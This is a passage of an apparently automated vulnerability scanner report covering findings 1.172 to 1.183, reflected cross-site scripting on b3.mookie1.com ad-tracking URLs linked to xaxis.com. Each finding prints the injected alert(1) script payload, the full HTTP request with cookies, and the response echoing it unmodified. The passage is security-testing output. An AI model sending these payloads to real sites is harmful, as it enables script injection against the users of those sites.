GET /2/TRACK_Xaxis98b8d"><script>alert(1)</script>2d9f50bf1e0/1048171804@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliance&_RM_HTML_referer_=&Section=Home HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; id=2814750682866683; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis98b8d"><script>alert(1)</script>2d9f50bf1e0/365523708/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.172. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1048171804@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c6be"><script>alert(1)</script>5a5f3b8395 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1048171804@x546c6be"><script>alert(1)</script>5a5f3b8395?&_RM_HTML_url_=http%3A//www.xaxis.com/&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliance&_RM_HTML_referer_=&Section=Home HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; id=2814750682866683; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 320
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/27172832/x546c6be"><script>alert(1)</script>5a5f3b8395/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG SR
...[SNIP]...

1.173. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [Section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1048171804@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e17dd'-alert(1)-'313b36618a8 was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1048171804@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliance&_RM_HTML_referer_=&Section=Homee17dd'-alert(1)-'313b36618a8 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; id=2814750682866683; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2043
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...

imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliance&_RM_HTML_referer_=&Section=Homee17dd'-alert(1)-'313b36618a8';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.174. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [_RM_HTML_referer_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1048171804@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35c8a'-alert(1)-'c5ba19030b3 was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1048171804@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliance&_RM_HTML_referer_=35c8a'-alert(1)-'c5ba19030b3&Section=Home HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; id=2814750682866683; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2043
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
t = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliance&_RM_HTML_referer_=35c8a'-alert(1)-'c5ba19030b3&Section=Home';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
...[SNIP]...

1.175. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [_RM_HTML_title_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1048171804@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a66ac'-alert(1)-'25ed2373604 was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1048171804@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliancea66ac'-alert(1)-'25ed2373604&_RM_HTML_referer_=&Section=Home HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; id=2814750682866683; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2099
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
tain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliancea66ac'-alert(1)-'25ed2373604&_RM_HTML_referer_=&Section=Home';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
...[SNIP]...

1.176. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1048171804@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8950f'-alert(1)-'7956232f713 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1048171804@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliance&_RM_HTML_referer_=&Section=Home&8950f'-alert(1)-'7956232f713=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; id=2814750682866683; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:40 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2046
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...

imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/&_RM_HTML_title_=Xaxis%20%u2502%20Digital%20Brilliance&_RM_HTML_referer_=&Section=Home&8950f'-alert(1)-'7956232f713=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.177. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [&_RM_HTML_url_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1138219538@x54

Issue detail

The value of the _RM_HTML_url_ request parameter (reported as &_RM_HTML_url_ because the query string begins with ?&, so the leading ampersand is carried along with the name) is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28754'-alert(1)-'c4876556689 was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1138219538@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact28754'-alert(1)-'c4876556689&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/contact&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2032
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
l preload the image request and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact28754'-alert(1)-'c4876556689&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/contact&Section=Contact';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?
...[SNIP]...

1.178. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1138219538@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 299bb"><script>alert(1)</script>6341c3fb444 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis299bb"><script>alert(1)</script>6341c3fb444/1138219538@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/contact&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis299bb"><script>alert(1)</script>6341c3fb444/697773924/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.179. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1138219538@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62833"><script>alert(1)</script>de33a4e6f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1138219538@x5462833"><script>alert(1)</script>de33a4e6f7?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/contact&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 321
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/620690805/x5462833"><script>alert(1)</script>de33a4e6f7/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG S
...[SNIP]...

1.180. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [Section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1138219538@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e00eb'-alert(1)-'7338c475611 was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1138219538@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/contact&Section=Contacte00eb'-alert(1)-'7338c475611 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2032
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...

imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/contact&Section=Contacte00eb'-alert(1)-'7338c475611';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.181. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [_RM_HTML_referer_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1138219538@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b0bb'-alert(1)-'767bb6c09a8 was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1138219538@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/contact8b0bb'-alert(1)-'767bb6c09a8&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:14 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2032
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
= new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/contact8b0bb'-alert(1)-'767bb6c09a8&Section=Contact';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection=
...[SNIP]...

1.182. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [_RM_HTML_title_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1138219538@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc403'-alert(1)-'00d23fdccb5 was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1138219538@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxisfc403'-alert(1)-'00d23fdccb5&_RM_HTML_referer_=http%3A//www.xaxis.com/contact&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2088
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxisfc403'-alert(1)-'00d23fdccb5&_RM_HTML_referer_=http%3A//www.xaxis.com/contact&Section=Contact';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var x
...[SNIP]...

1.183. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1138219538@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84aac'-alert(1)-'f6bd1f4c180 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

